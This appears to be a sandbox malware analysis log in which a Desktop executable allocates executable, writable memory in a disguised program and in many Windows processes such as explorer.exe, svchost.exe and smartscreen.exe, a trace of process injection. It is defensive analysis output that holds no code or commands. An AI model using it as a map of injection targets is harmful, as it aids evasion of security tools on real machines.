            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 330000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 340000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 6E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 730000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2270000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 14B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1500000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2610000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2660000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: FA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 3C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 3D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: FE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2920000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2970000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 6E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 740000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2290000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2800000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2810000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 24F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2500000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2B60000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2BB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 29A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 29F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 720000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2150000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: DF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: E00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: AE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2BC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2BD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1250000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1260000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 880000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 21B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2330000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2380000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: AC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: AD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: FA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2780000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2790000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 11A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 11B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 3020000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 780000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 790000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1370000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 13C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B00000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 14C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 14D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2500000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2560000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: C70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: CC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2940000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2950000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: AF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 7A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 7B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 9E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: AE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dwm.exe base: 20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\sihost.exe base: 3C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: 990000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: AC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\explorer.exe base: 2D10000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: BE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 8D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: EE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 960000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: C50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\conhost.exe base: 590000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: DC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: A90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 6C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 9D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 9F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: AF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\dwm.exe base: 30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\sihost.exe base: 3D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: 30000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 9A0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\ctfmon.exe base: AD0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\explorer.exe base: 2D30000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: BF0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CC0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 8E0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: EF0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9E0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 970000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\smartscreen.exe base: 90000 protect: page execute and read and write
